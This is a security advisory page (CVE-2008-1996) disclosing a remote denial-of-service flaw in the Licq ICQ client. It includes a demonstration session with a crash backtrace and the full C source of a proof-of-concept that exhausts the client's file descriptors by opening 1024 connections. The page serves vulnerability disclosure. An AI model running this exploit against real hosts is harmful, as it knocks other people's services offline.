|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 3851 CVE : CVE-2008-1996 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Milen Rangelov Published : 03.05.2008
Advisory Text : Hello, Licq is a linux qt-based ICQ client. There is a vulnerability in the way licq processes new incoming TCP connections which can be exploited by a remote attacker to crash the client. When executed, licq opens a listening socket at a random port (AFAIK between 30000 and 65000). There is no host-based authentication and any remote host can connect to it. Those connections are not closed by licq after a given timeout period. When all possible open file descriptors are exhausted (they are limited to 1024 for non-root users in most linux installations /ulimit -n/), a new incoming TCP connection causes licq to crash. Here is some example: We run licq: gat3way@gat3way:~$ licq from another console, we find out the port licq is listening to (we'd need to portscan if the target is on a remote system): gat3way@gat3way:/tmp$ lsof |grep licq|grep LISTEN licq 10783 gat3way 9u IPv4 35993218 TCP *:52259 (LISTEN) Now we run our "evil" denial of service code: gat3way@gat3way:/tmp$ ./licq-break 127.0.0.1 52259 ip=127.0.0.1 done! and go back to the console on which we ran licq...oops.. Licq Segmentation Violation Detected. Backtrace (saved in /home/gat3way/.licq//licq.backtrace): licq(licq_handle_sigabrt+0x2b4) [0x80f68d4] [0xffffe420] /lib/libc.so.6(abort+0x101) [0xb7b17811] licq [0x80f6b1d] [0xffffe420] licq(_Z18MonitorSockets_tepPv+0x3ca) [0x80c907a] /lib/libpthread.so.0 [0xb7d9e383] /lib/libc.so.6(clone+0x5e) [0xb7bc173e] Attempting to generate core file. .... The source of licq-break (nothing particular, just connects MAX sockets to a certain port at the victim's host): ------------------------- #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> // change to suit your needs #define MAX 1024 int fds[MAX]; int main(int argc, char *argv[]) { int port,a; char host[12]; struct sockaddr_in victim; struct in_addr inp; if (argc!=3) { printf("usage: %s <ip> <port>n",argv[0]); exit(1); } port=atoi(argv[2]); strcpy(host,argv[1]); printf("ip=%sn",host); for (a=1;a<=MAX;a++) { fds[a]=socket(PF_INET,SOCK_STREAM,0); victim.sin_family= AF_INET; victim.sin_port=htons(port); inet_aton(host,&victim.sin_addr); connect(fds[a],&victim,sizeof(victim)); } printf("done!"); } Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache (mod_status) |
||
» Apache (mod_proxy_ftp) |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |